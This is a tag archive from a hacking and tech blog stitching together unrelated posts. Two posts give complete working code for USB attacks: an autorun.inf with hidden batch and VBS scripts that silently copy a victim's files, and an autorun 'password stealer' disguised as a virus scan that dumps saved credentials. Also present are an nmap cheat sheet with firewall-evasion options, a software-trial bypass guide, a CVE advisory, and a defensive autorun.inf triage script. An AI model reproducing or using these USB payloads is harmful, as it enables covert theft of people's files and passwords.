Posts Tagged ‘computer’

Please use responsibly. Caintech.co.uk takes no responsibility for the use of the following information; it should only be used for educational purposes.

How to steal files with a USB

For this, you’ll need a USB device or anything that will plug into a PC and can hold data.

Step One-

Open Notepad and paste the code below

[autorun]
icon=icon.ico
open=explorer.bat
action=Open folders to view files
shell\open\command=launch.bat

Save it as Autorun.inf
paste to the USB an icon called icon.ico
change the “Open folders to view files”.

Step Two-

Open notepad again and paste the code below

@echo on
:: variables
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo on

%backupcmd% “%USERPROFILE%\Desktop\*.avi” “%drive%\private\vid”
%backupcmd% “%USERPROFILE%\Favorites” “%drive%\private\favorites”
%backupcmd% “%USERPROFILE%\Desktop\*.jpg” “%drive%\private\img”
%backupcmd% “%USERPROFILE%\Desktop\*.jpeg” “%drive%\private\img”
%backupcmd% “%USERPROFILE%\Desktop\*.bmp” “%drive%\private\img”
%backupcmd% “%USERPROFILE%\Desktop\*.3gp” “%drive%\private\vid”
%backupcmd% “%USERPROFILE%\Desktop\*.mp4” “%drive%\private\vid”
%backupcmd% “%USERPROFILE%\Desktop\*.wmv” “%drive%\private\vid”
%backupcmd% “%USERPROFILE%\Contacts” “%drive%\private\contacts”
%backupcmd% “%USERPROFILE%\Links” “%drive%\private\links”
%backupcmd% “%USERPROFILE%\My Documents\My Music” “%drive%\private\mp3”
%backupcmd% “%USERPROFILE%\My Documents\Downloads” “%drive%\private\downloads”
%backupcmd% “%USERPROFILE%\My Music” “%drive%\private\mp3”
%backupcmd% “%USERPROFILE%\My Documents\*.jpg” “%drive%\private\img”
%backupcmd% “%USERPROFILE%\My Documents\*.bmp” “%drive%\private\img”
%backupcmd% “%USERPROFILE%\My Documents\*.avi” “%drive%\private\vid”
%backupcmd% “%USERPROFILE%\My Documents\*.mpg” “%drive%\private\vid”
%backupcmd% “%USERPROFILE%\My Documents\*.3gp” “%drive%\private\vid”
%backupcmd% “%USERPROFILE%\My Documents\*.mp4” “%drive%\private\vid”
%backupcmd% “%USERPROFILE%\My Pictures” “%drive%\private\img”
%backupcmd% “%USERPROFILE%\Videos” “%drive%\private\vid”
%backupcmd% “%USERPROFILE%\Music” “%drive%\private\mp3”
%backupcmd% “%USERPROFILE%\Downloads” “%drive%\private\downloads”
%backupcmd% “D:\*.jpg” “%drive%\private\img”
%backupcmd% “D:\*.jpeg” “%drive%\private\img”
%backupcmd% “D:\*.bmp” “%drive%\private\img”
%backupcmd% “D:\*.3gp” “%drive%\private\vid”
%backupcmd% “D:\*.mp4” “%drive%\private\vid”
%backupcmd% “D:\*.avi” “%drive%\private\vid”
%backupcmd% “D:\*.wmv” “%drive%\private\vid”
%backupcmd% “D:\*.doc” “%drive%\private\documents”
%backupcmd% “D:\*.pdf” “%drive%\private\documents”
@echo on
cls

Save it as explorer.bat
this script copies files from Music/Videos/downloads/

Then these files are copied to their respective folders.
Note: create on your USB a folder called private
and on this folder create these folders:
contacts
documents
downloads
favourites
img
links
mp3
vid

Step 3

Open notepad again and paste the code below

CreateObject(“Wscript.Shell”).Run “””” & WScript.Arguments(0) & “”””, 0, False

Save it as invisible.vbs
This code runs explorer.bat as a process so it does not show the CMD prompt and everything the batch file is processing.

Step Four

Open notepad again for the last time and paste the code below

wscript.exe \invisible.vbs explorer.bat

Save this as launch.bat
This batch file does two things, it looks for the invisible.vbs file in the root of the Flash drive then loads it with explorer.bat so file.bat is run with code from vbs file.

Step Five

Paste all 4 files in the root of your flash drive. Don’t forget to paste the icon
Create the folders I mentioned in step 2.
If you want you can make the files and folders hidden so they won’t be visible 🙂
Note: This will work only if your target will click “Open folders to view files” so in order for this to work auto run must be enabled or you can get them to double click the icon.

(-_(-_(-_-)_-)_-)


Microsoft Windows contains a vulnerability (CVE-2013-3660) that could allow a local attacker to gain elevated privileges on a targeted system. The vulnerability, classified as critical, has been found in Microsoft Windows XP/Vista/7/2000/Server 2003/2008. It affects the function win32k!EPATHOBJ::pprFlattenRec of the kernel component. The vulnerability is due to improper handling of certain objects in kernel memory by the affected software. A local attacker with access to a targeted system could exploit this vulnerability by running a malicious program that is designed to cause the Windows kernel to perform improper memory operations on certain objects. If successful, the attacker could execute arbitrary code on the system with the privileges of the kernel, resulting in a complete system compromise. Proof-of-concept code that exploits this vulnerability is publicly available.

CVE: CVE-2013-3660
Remote: No
Local: Yes
Updated: Jul 02 2013 08:21AM
Credit: Tavis Ormandy
Vulnerable: Microsoft Windows XP Professional SP3
Microsoft Windows XP Professional SP2
Microsoft Windows XP Media Center Edition SP3
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows XP Home SP3
Microsoft Windows XP Home SP2
Microsoft Windows Vista SP2
Microsoft Windows Server 2008 Enterprise Edition SP2
Microsoft Windows Server 2008 Datacenter Edition SP2
Microsoft Windows Server 2008 R2 SP1
Microsoft Windows Server 2003 SP2
Microsoft Windows 8 0
Microsoft Windows 7 Professional 0
Microsoft Windows 7 for 32-bit Systems SP1

Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.com.

http://cvedetails.com/cve/CVE-2013-3660

 


 

The de facto standard in network scanning for many years has been Nmap. Nmap is supported on Linux and Windows alike and is free to download > Download Nmap

The only thing I have found is that there are so many commands that it is difficult to remember what to enter, so here is a quick guide for fast scanning. I have also created it as a PDF for easy reference > Caintech.co.uk Nmap Cheat

Basic Scanning Techniques

Scan a single target —> nmap [target]

Scan multiple targets —> nmap [target1 target2 etc]

Scan a list of targets —-> nmap -iL [list.txt]

Scan a range of hosts —-> nmap [range of IP addresses]

Scan an entire subnet —-> nmap [IP address/cidr]

Scan random hosts —-> nmap -iR [number]

Excluding targets from a scan —> nmap [targets] --exclude [targets]

Excluding targets using a list —> nmap [targets] --excludefile [list.txt]

Perform an aggressive scan —> nmap -A [target]

Scan an IPv6 target —> nmap -6 [target]

Discovery Options

Perform a ping scan only —> nmap -sP [target]

Don’t ping —> nmap -PN [target]

TCP SYN Ping —> nmap -PS [target]

TCP ACK ping —-> nmap -PA [target]

UDP ping —-> nmap -PU [target]

SCTP Init Ping —> nmap -PY [target]

ICMP echo ping —-> nmap -PE [target]

ICMP Timestamp ping —> nmap -PP [target]

ICMP address mask ping —> nmap -PM [target]

IP protocol ping —-> nmap -PO [target]

ARP ping —> nmap -PR [target]

Traceroute —> nmap --traceroute [target]

Force reverse DNS resolution —> nmap -R [target]

Disable reverse DNS resolution —> nmap -n [target]

Alternative DNS lookup —> nmap --system-dns [target]

Manually specify DNS servers —> nmap --dns-servers [servers] [target]

Create a host list —-> nmap -sL [targets]

Advanced Scanning Options

TCP SYN Scan —> nmap -sS [target]

TCP connect scan —-> nmap -sT [target]

UDP scan —-> nmap -sU [target]

TCP Null scan —-> nmap -sN [target]

TCP Fin scan —> nmap -sF [target]

Xmas scan —-> nmap -sX [target]

TCP ACK scan —> nmap -sA [target]

Custom TCP scan —-> nmap --scanflags [flags] [target]

IP protocol scan —-> nmap -sO [target]

Send Raw Ethernet packets —-> nmap --send-eth [target]

Send IP packets —-> nmap --send-ip [target]

Port Scanning Options

Perform a fast scan —> nmap -F [target]

Scan specific ports —-> nmap -p [ports] [target]

Scan ports by name —-> nmap -p [port name] [target]

Scan ports by protocol —-> nmap -sU -sT -p U:[ports],T:[ports] [target]

Scan all ports —-> nmap -p "*" [target]

Scan top ports —–> nmap --top-ports [number] [target]

Perform a sequential port scan —-> nmap -r [target]

Version Detection

Operating system detection —-> nmap -O [target]

Submit TCP/IP Fingerprints —-> http://www.nmap.org/submit/

Attempt to guess an unknown OS —-> nmap -O --osscan-guess [target]

Service version detection —-> nmap -sV [target]

Troubleshooting version scans —-> nmap -sV --version-trace [target]

Perform a RPC scan —-> nmap -sR [target]

Timing Options

Timing Templates —-> nmap -T [0-5] [target]

Set the packet TTL —-> nmap --ttl [time] [target]

Minimum of parallel connections —-> nmap --min-parallelism [number] [target]

Maximum of parallel connections —-> nmap --max-parallelism [number] [target]

Minimum host group size —–> nmap --min-hostgroup [number] [targets]

Maximum host group size —-> nmap --max-hostgroup [number] [targets]

Initial RTT timeout —–> nmap --initial-rtt-timeout [time] [target]

Maximum RTT timeout —-> nmap --max-rtt-timeout [time] [target]

Maximum retries —-> nmap --max-retries [number] [target]

Host timeout —-> nmap --host-timeout [time] [target]

Minimum Scan delay —-> nmap --scan-delay [time] [target]

Maximum scan delay —-> nmap --max-scan-delay [time] [target]

Minimum packet rate —-> nmap --min-rate [number] [target]

Maximum packet rate —-> nmap --max-rate [number] [target]

Defeat reset rate limits —-> nmap --defeat-rst-ratelimit [target]

Firewall Evasion Techniques

Fragment packets —-> nmap -f [target]

Specify a specific MTU —-> nmap --mtu [MTU] [target]

Use a decoy —-> nmap -D RND:[number] [target]

Idle zombie scan —> nmap -sI [zombie] [target]

Manually specify a source port —-> nmap --source-port [port] [target]

Append random data —-> nmap --data-length [size] [target]

Randomize target scan order —-> nmap --randomize-hosts [target]

Spoof MAC Address —-> nmap --spoof-mac [MAC|0|vendor] [target]

Send bad checksums —-> nmap --badsum [target]

Output Options

Save output to a text file —-> nmap -oN [scan.txt] [target]

Save output to a xml file —> nmap -oX [scan.xml] [target]

Grepable output —-> nmap -oG [scan.txt] [target]

Output all supported file types —-> nmap -oA [path/filename] [target]

Periodically display statistics —-> nmap --stats-every [time] [target]

l33t output —-> nmap -oS [scan.txt] [target]

Troubleshooting and debugging

Help —> nmap -h

Display Nmap version —-> nmap -V

Verbose output —-> nmap -v [target]

Debugging —-> nmap -d [target]

Display port state reason —-> nmap --reason [target]

Only display open ports —-> nmap --open [target]

Trace packets —> nmap --packet-trace [target]

Display host networking —> nmap --iflist

Specify a network interface —> nmap -e [interface] [target]

Nmap Scripting Engine

Execute individual scripts —> nmap --script [script.nse] [target]

Execute multiple scripts —-> nmap --script [expression] [target]

Script categories —-> all, auth, default, discovery, external, intrusive, malware, safe, vuln

Execute scripts by category —-> nmap --script [category] [target]

Execute multiple scripts categories —-> nmap --script [category1,category2,etc]

Troubleshoot scripts —-> nmap --script [script] --script-trace [target]

Update the script database —-> nmap --script-updatedb

Ndiff

Comparison using Ndiff —-> ndiff [scan1.xml] [scan2.xml]

Ndiff verbose mode —-> ndiff -v [scan1.xml] [scan2.xml]

XML output mode —-> ndiff --xml [scan1.xml] [scan2.xml]

For more excellent FREE security training visit >

http://learnnetsec.com 

http://www.youtube.com/user/NetSecNow

 

 


How secure are your passwords? Hopefully they’re more clever than these top 25 most-popular (and therefore least secure) passwords.

SplashData, an online security management firm, compiled this list for 2012:

  1. password
  2. 123456
  3. 12345678
  4. qwerty
  5. abc123
  6. monkey
  7. 1234567
  8. letmein
  9. trustno1
  10. dragon
  11. baseball
  12. 111111
  13. iloveyou
  14. master
  15. sunshine
  16. ashley
  17. bailey
  18. passw0rd
  19. shadow
  20. 123123
  21. 654321
  22. superman
  23. qazwsx
  24. michael
  25. football

Are any of your passwords on the list? If so, it’s time to upgrade to one with varying numbers, capitalization and figures. Separate words with spaces or underscores. For crying out loud, don’t use your pet’s or your spouse’s name or even your children’s names.

Caintech.co.uk

GCC has had support for 64-bit ARM, a.k.a. AArch64, going back to last summer for using the open-source compiler with next-generation ARMv8 hardware. Support for an experimental 64-bit ARM/AArch64 back-end target is finally being merged into the LLVM compiler infrastructure today.

A patch adding forty-five thousand lines of new code to the LLVM tree brings support for ARM’s 64-bit architecture to LLVM. This target is currently experimental and not built by default; enabling it requires a compile-time switch. However, there’s already talk amongst developers about enabling 64-bit ARM support by default. This work was merged into mainline LLVM this morning and will thus be found in the LLVM 3.3 release due out in a couple of months’ time.

This initial AArch64 LLVM compiler support covers Assembly for all scalar instructions except for the late addition CRC instructions, code generation features needed for C++0x and C99, compilation support for the small memory model, absolute and position-independent code support, GNU-style TLS, and debugging support.

The 64-bit ARM compiler support, however, has yet to undergo any performance tuning for the greatest compiler performance. With there still being a few months to go until LLVM 3.3 is released, this will likely be achieved before the AArch64 LLVM support is in any released version.

Another limitation is that there isn’t any NEON support for the AArch64 experimental target because the developer says there was “an outbreak of batshit insanity in [ARM’s] legal department.”

The initial AArch64/ARMv8 instruction set support for LLVM can be found by cloning the LLVM SVN/Git repository where this big patch landed today.

LLVM 3.3 should be a fantastic release since, aside from the 64-bit ARM support, there will also be the AMD Radeon GPU back-end, likely the enabling by default of the new loop vectorizer, and many other features for this open-source compiler infrastructure.

We’ve seen hundreds of builds tinker around with the GPIO pins on the Raspberry Pi. They’re great for bridging the gap between physical sensors and a virtual world, but there are a few more unused and ignored pins on the Raspberry Pi. The folks at the Raspberry Pi foundation are finally giving these unused pins a life of their own with the new camera module for our favorite single board computer.

The specs for the camera are fairly impressive – it can record H.264 video at 1080p and 30 frames per second. Best of all, it costs only $25.

There are a few more hurdles to pass before the Raspi foundation can send this board out to manufacturers. They still need to make sure the ribbon cable doesn’t emit any interference, but if all goes right the camera module should be available early next year.

You can see the camera in action in the video after the break. If you listen closely you can hear [Rob Bishop] of the Raspi foundation say they’re also working on a display add-on for the other unused pins on the Pi, something we can’t wait to see.

Please note: back up your Registry before attempting to modify it in any way, just in case you make a mistake. Here’s how:

  1. Depending on your version of Windows, do one of the following:
    • For Windows XP: Click Start > Run.
    • For Windows 7 or Vista: Click the Start button, and then click All Programs > Accessories > Run.
  2. In the Run dialog box, type the following text:

    regedit

  3. Click OK.

    If the User Account Control window appears, click Continue.

  4. On the File menu, click Export.
  5. In the File name box, type a name that you will remember, such as Registry Backup.
  6. Select a location where you want to save the Registration Entries (.reg) file, I suggest your desktop.
  7. Click Save.

OK, now that has been done, let’s get into the real technical stuff.

Changing the default installation path in Windows 7 isn’t all that difficult. We all know that the default installation path is C:\Program Files, but if you want to change this to another drive, so that it becomes the default path for all new program installations, you can do so with a few clicks in the Registry Editor.

For x64 users, simply copy and paste the following into the Run box:

%systemroot%\syswow64\regedit

For x32 users, go to Start, type Regedit in the Search box and hit Enter to open the Registry Editor.

Now the Registry Editor will open

  • Now locate the following key: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion

You will see that I have marked ProgramFilesDir for the x32 version and ProgramW6432Dir for the x64 version; you will need to change both if you are running an x64 version.

So, if you have the x32 version of Windows, choose the ProgramFilesDir (x86) path by right-clicking it and selecting Modify.

Then simply change the drive letter and path to where you want to install your programs and click OK.

  • For x32 users, that’s it, all done!

So, if you have the x64 version of Windows, choose and modify both the ProgramFilesDir (x86) and ProgramW6432Dir paths by right-clicking each and selecting Modify.

Then simply change the drive letter and path to where you want to install your programs and click OK.

If you have messed it up and get errors when you reboot your machine, a simple way to revert to the previous version of the registry is as follows:

Reboot the machine and keep tapping F8; this will take you into ‘Safe Mode’.

When the desktop boots, double-click the .reg file you made earlier in this tutorial, and when prompted with a warning (as below) press ‘Yes’.

Reboot, and you are back to how your registry was before you started (now print this tutorial out and try again).

 

This post is of course for educational purposes only.

Although the title of this post implies that this is designed for a USB, any device like an MP3 player or a mobile phone can be used as they can all execute programs.

We know that Windows stores most of its passwords on a daily basis, such as MSN Messenger passwords, Yahoo passwords, Facebook passwords, etc. Most people hate to type passwords over and over again, so when that little tick box appears asking to save/remember the password, the opportunity is jumped at; this shall be their undoing.

 

Things you will need?
Note: Before downloading the following apps you might want to disable your Anti Virus, as most of these will appear as a suspicious file.

MessenPass – MessenPass is a password recovery tool that reveals the passwords of the following instant messenger applications:

  • MSN Messenger
  • Windows Messenger (In Windows XP)
  • Windows Live Messenger (In Windows XP/Vista/7)
  • Yahoo Messenger (Versions 5.x and 6.x)
  • Google Talk
  • ICQ Lite 4.x/5.x/2003
  • AOL Instant Messenger v4.6 or below, AIM 6.x, and AIM Pro.
  • Trillian
  • Trillian Astra
  • Miranda
  • GAIM/Pidgin
  • MySpace IM
  • PaltalkScene
  • Digsby

Mail PassView – Mail PassView is a small password-recovery tool that reveals the passwords and other account details for:

  • Outlook Express
  • Microsoft Outlook 2000 (POP3 and SMTP Accounts only)
  • Microsoft Outlook 2002/2003/2007/2010 (POP3, IMAP, HTTP and SMTP Accounts)
  • Windows Mail
  • Windows Live Mail
  • IncrediMail
  • Eudora
  • Netscape 6.x/7.x (If the password is not encrypted with master password)
  • Mozilla Thunderbird (If the password is not encrypted with master password)
  • Group Mail Free
  • Yahoo! Mail – If the password is saved in Yahoo! Messenger application.
  • Hotmail/MSN mail – If the password is saved in MSN/Windows/Live Messenger application.
  • Gmail – If the password is saved by Gmail Notifier application, Google Desktop, or by Google Talk.

IE Passview – IE passview is a small program that helps us view stored passwords in Internet Explorer.

Protected storage pass viewer(PSPV) –  Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer.

Password Fox – Password fox is a small program used to view Stored passwords in Mozilla Firefox

Now here is a step by step tutorial to create a USB password stealer to steal saved passwords:

1.First of all download all 5 tools and copy the executable files in your USB  i.e. Copy the files  mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.
2. Create a new Notepad and write the following text into it.

[autorun]

open=launch.bat

ACTION= Perform a Virus Scan

save the Notepad and rename it from

New Text Document.txt to autorun.inf

Now copy the autorun.inf file onto your USB

 

3. Create another Notepad and write the following text onto it.

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt
Save the Notepad file and rename it from New Text Document.txt to launch.bat

Copy the launch.bat file also to your USB drive.
Now your USB Password stealer is ready, all you have to do is insert it in your victims computer and  a popup will appear, in the popup window select the option (Launch virus scan) as soon as you will click it the following window will appear.

After this you can see saved password in .TXT files on the USB
Have fun and hack responsibly
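
A defender's view of the two autorun.inf files shown in the USB file-copy post and in this post, as an added example that is not part of the original posts: a Python triage script that parses an autorun.inf found on removable media and flags entries that launch scripts or executables, and AutoPlay captions that imitate Explorer or a security tool. The function names, the extension list and the caption keywords are assumptions chosen for illustration; the benign sample is constructed.

```python
import re
from pathlib import Path

# Extensions that run code when an autorun entry launches them (assumed list).
EXEC_EXT = {".bat", ".cmd", ".vbs", ".vbe", ".js", ".jse", ".wsf", ".ps1",
            ".exe", ".scr", ".com", ".pif", ".lnk"}
# Keys that make Windows start something: open=, shellexecute=, shell\<verb>\command=
LAUNCH_KEYS = {"open", "shellexecute"}
SHELL_CMD = re.compile(r"^shell\\[^\\]+\\command$")
# Caption fragments that imitate Explorer or a security tool (assumed heuristic).
LURES = ("open folder", "view files", "virus scan")
FIRST_TOKEN = re.compile(r'"([^"]+)"|(\S+)')

# The two autorun.inf files as they appear in the posts, plus a constructed benign one.
SAMPLE_FILE_COPIER = r"""[autorun]
icon=icon.ico
open=explorer.bat
action=Open folders to view files
shell\open\command=launch.bat
"""
SAMPLE_PASSWORD_DUMPER = """[autorun]

open=launch.bat

ACTION= Perform a Virus Scan
"""
SAMPLE_BENIGN = "[autorun]\nicon=setup.ico\nlabel=Backup Disk\n"  # constructed


def parse_autorun(text):
    """Return (lower-cased key, value) pairs from the [autorun] section only."""
    entries, in_section = [], False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "autorun"
            continue
        if in_section and "=" in line:
            key, value = line.split("=", 1)
            entries.append((key.strip().lower(), value.strip()))
    return entries


def audit_autorun(text):
    """Return (finding, key, value) tuples in file order; empty list means nothing flagged."""
    findings = []
    for key, value in parse_autorun(text):
        if key in LAUNCH_KEYS or SHELL_CMD.match(key):
            m = FIRST_TOKEN.match(value)  # first token, quoted or not, is the program
            target = (m.group(1) or m.group(2)) if m else ""
            ext = Path(target.replace("\\", "/")).suffix.lower()
            if ext in EXEC_EXT:
                findings.append(("launches-code", key, value))
        elif key == "action" and any(l in value.lower() for l in LURES):
            findings.append(("lure-caption", key, value))
    return findings


def scan_drive(root):
    """Audit any autorun.inf (matched case-insensitively) in the root of a mounted volume."""
    results = {}
    for p in Path(root).iterdir():
        if p.is_file() and p.name.lower() == "autorun.inf":
            results[p.name] = audit_autorun(p.read_text(errors="replace"))
    return results


if __name__ == "__main__":
    samples = [("file copier", SAMPLE_FILE_COPIER),
               ("password dumper", SAMPLE_PASSWORD_DUMPER),
               ("benign", SAMPLE_BENIGN)]
    for name, text in samples:
        print(name, audit_autorun(text))
```

Setting the `NoDriveTypeAutoRun` policy value to `0xFF` under `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer` disables AutoRun for all drive types, which removes the trigger both posts depend on.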


In this post, I will show you how to hack Software and run the trial program forever. Most of us are familiar with many software programs that run only for a specified period of time in the trial mode. Once the trial period is expired, these programs stop functioning and demand for a purchase.

However, there is a way to run the software programs so that they function beyond the trial period. Isn’t this interesting?

Well, before I tell you how to hack the software and make it run in the trial mode forever, we will have to first understand how the licensing scheme of these programs work. I’ll try to explain this in brief.

When the software programs are installed for the first time, they make an entry into the Windows Registry with the details such as installed Date and Time, installed path etc. After the installation, every time you run the program, it compares the current system date and time with the installed date and time. With this, it can make out whether the trial period is expired or not.

So, with this being the case, just manually changing the system date to an earlier date will not solve the problem. For this purpose there is a small tool known as RunAsDate.

RunAsDate is a small utility that allows you to run a program in the date and time that you specify. This utility doesn’t change the current system date, but it only injects the date/time that you specify into the desired application.

RunAsDate intercepts the kernel API calls that return the current date and time (GetSystemTime, GetLocalTime, GetSystemTimeAsFileTime), and replaces the current date/time with the date/time that you specify. It works with Windows 2000, XP, 2003, Vista and 7.

You can download RunAsDate from the following link:

Download RunAsDate

NOTE: FOLLOW THESE TIPS CAREFULLY:

You will have to follow these tips carefully to successfully hack a software and make it run in its trial mode forever:

  1. Note down the date and time, when you install the software for the first time.
  2. Once the trial period expires, you must always run the software using RunAsDate.
  3. After the trial period is expired, do not run the software (program) directly. If you run the software directly even once, this hack may no longer work.
  4. It is better and safe to inject the date of the last day in the trial period.

For example, if the trial period expires on Jan 30 2012, always inject the date as Jan 29 2012 in the RunAsDate. I hope this helps! Please express your experience and opinions through comments.

Police have detained a 22-year-old hacker who created a system of networked computers that was used to steal more than 150 million rubles ($4.47 million) from people’s bank accounts and who was already one of the most wanted hackers in the world. Now “Hermes”, who is said to have tapped more than six million computers and earned around 5 million francs, has been caught in Russia.

The network infected around six million computers with a Trojan virus, which helped get access to users’ bank accounts. Using the secretly installed Trojans, he arranged illegal money transfers, the interior ministry in Moscow said on Friday.

Police from Division K, the cybercrime branch of the Interior Ministry, searched the hacker’s place of residence, confiscating computers and arresting the suspect. The statement did not specify when the arrest was made.

The botnet built by the hacker included around 6 million computers from regions that included Krasnodar, Samara, and Ivanovo, as well as from the cities of Moscow and St. Petersburg, where the majority of the infected computers were located.

The hacker faces a lengthy jail term if convicted on fraud charges.